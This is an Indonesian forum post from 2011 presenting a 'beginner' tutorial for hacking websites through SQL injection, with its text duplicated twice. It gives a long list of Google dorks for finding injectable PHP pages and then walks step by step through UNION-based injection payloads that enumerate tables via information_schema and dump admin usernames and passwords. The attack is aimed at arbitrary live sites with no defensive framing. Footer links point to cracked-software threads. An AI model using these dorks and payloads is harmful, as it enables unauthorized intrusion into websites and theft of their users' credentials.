Indeks![[TUT] Hack website for beginners (SQL) [TUT] hacking website very simple. FULL Tutorial I_vote_lcap](https://2img.net/s/t/15/94/27/i_vote_lcap.png){kind=small}
![[TUT] Hack website for beginners (SQL) [TUT] hacking website very simple. FULL Tutorial I_voting_bar](https://2img.net/s/t/15/94/27/i_voting_bar.png){kind=small}
![[TUT] Hack website for beginners (SQL) [TUT] hacking website very simple. FULL Tutorial I_vote_rcap](https://2img.net/s/t/15/94/27/i_vote_rcap.png){kind=small}
Contact Me
Social bookmarking
Bookmark and share the address of .: SouLmaTe Forum :. on your social bookmarking website
Bookmark and share the address of .: SouLmaTe Forum :. on your social bookmarking website
[TUT] Hack website for beginners (SQL) [TUT] hacking website very simple. FULL Tutorial
Halaman 1 dari 1
[TUT] Hack website for beginners (SQL) [TUT] hacking website very simple. FULL Tutorial
Lee™ Sun Jun 05, 2011 10:19 am
Kali ini saya akan mencoba memberikan ilmu hacking saya
Oke deh ga usah basa basi lagi
Langkah yang harus dilakukan untuk mengHack suatu sites atau websites adalah kesabaran dan ketelitian tinggi
Mengapa ?
Karena Ketelitian dan kesabaran adalah faktor terpenting
Ya udah deh dari pada saya ngoceh ngoceh kaga jelas.
Simak aja dibawah ini :
1. Silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner ,
kalau saya menggunakan SQLi Scanner di [You must be registered and logged in to see this link.] ama [You must be registered and logged in to see this link.]
2. Pilih aja dork listnya:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
3. Untuk yang pakai manual cek di google/bing:
contoh : [You must be registered and logged in to see this link.] < You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ..
berarti Webnya bisa di hack
untuk yang pakai scanner : udah disediain web yang bisa dihack
4. Lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error
example:
[You must be registered and logged in to see this link.] order by 1-- <-- no error
[You must be registered and logged in to see this link.] order by 2-- <-- no error
[You must be registered and logged in to see this link.] order by 3-- <-- no error
[You must be registered and logged in to see this link.] order by 4-- <-- ERROR..!
5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan : [You must be registered and logged in to see this link.] union all select 1,2,3--
(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)
6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex: [You must be registered and logged in to see this link.] union all select 1,@@version,3--
7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!
8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
ex:
[You must be registered and logged in to see this link.] union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
Spoiler untuk hex kata
1. buka link: [You must be registered and logged in to see this link.]
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex:
jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
ex: [You must be registered and logged in to see this link.] union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--
10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password contoh:
group_concat(username,0x3a,password)
<- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a
lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users)
maka from users--
example: [You must be registered and logged in to see this link.] union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
Semoga bermanfaat yah ^_^
Mungkin bagi yang belum tau apa apa pasti akan merasa pusing dan bingung membaca threat saya di atas,tapi yakin lah bahwa jika kita mau berusaha,kita pasti bisa
Maju terus untuk Hacker Indonesia ^_^
Oke deh ga usah basa basi lagi
Langkah yang harus dilakukan untuk mengHack suatu sites atau websites adalah kesabaran dan ketelitian tinggi
Mengapa ?
Karena Ketelitian dan kesabaran adalah faktor terpenting
Ya udah deh dari pada saya ngoceh ngoceh kaga jelas.
Simak aja dibawah ini :
1. Silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner ,
kalau saya menggunakan SQLi Scanner di [You must be registered and logged in to see this link.] ama [You must be registered and logged in to see this link.]
2. Pilih aja dork listnya:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
3. Untuk yang pakai manual cek di google/bing:
contoh : [You must be registered and logged in to see this link.] < You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ..
berarti Webnya bisa di hack
untuk yang pakai scanner : udah disediain web yang bisa dihack
4. Lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error
example:
[You must be registered and logged in to see this link.] order by 1-- <-- no error
[You must be registered and logged in to see this link.] order by 2-- <-- no error
[You must be registered and logged in to see this link.] order by 3-- <-- no error
[You must be registered and logged in to see this link.] order by 4-- <-- ERROR..!
5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan : [You must be registered and logged in to see this link.] union all select 1,2,3--
(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)
6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex: [You must be registered and logged in to see this link.] union all select 1,@@version,3--
7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!
8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
ex:
[You must be registered and logged in to see this link.] union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
Spoiler untuk hex kata
1. buka link: [You must be registered and logged in to see this link.]
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex:
jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
ex: [You must be registered and logged in to see this link.] union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--
10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password contoh:
group_concat(username,0x3a,password)
<- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a
lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users)
maka from users--
example: [You must be registered and logged in to see this link.] union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
Semoga bermanfaat yah ^_^
Mungkin bagi yang belum tau apa apa pasti akan merasa pusing dan bingung membaca threat saya di atas,tapi yakin lah bahwa jika kita mau berusaha,kita pasti bisa
Maju terus untuk Hacker Indonesia ^_^
Lee™- Senior
- Jumlah posting : 100
Join date : 30.05.11
Lokasi : Semarang
Similar topics» Cara Membuat Website di 000webhost
» Winamp 5.58 Pro Full With DFX 9.300 Keygen
» FL Studio XXL 9.1 Full Crack
» Nero 10.2 [2010] Full Activated
» Hacking Rapidshare Download Full Speed
» Winamp 5.58 Pro Full With DFX 9.300 Keygen
» FL Studio XXL 9.1 Full Crack
» Nero 10.2 [2010] Full Activated
» Hacking Rapidshare Download Full Speed
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik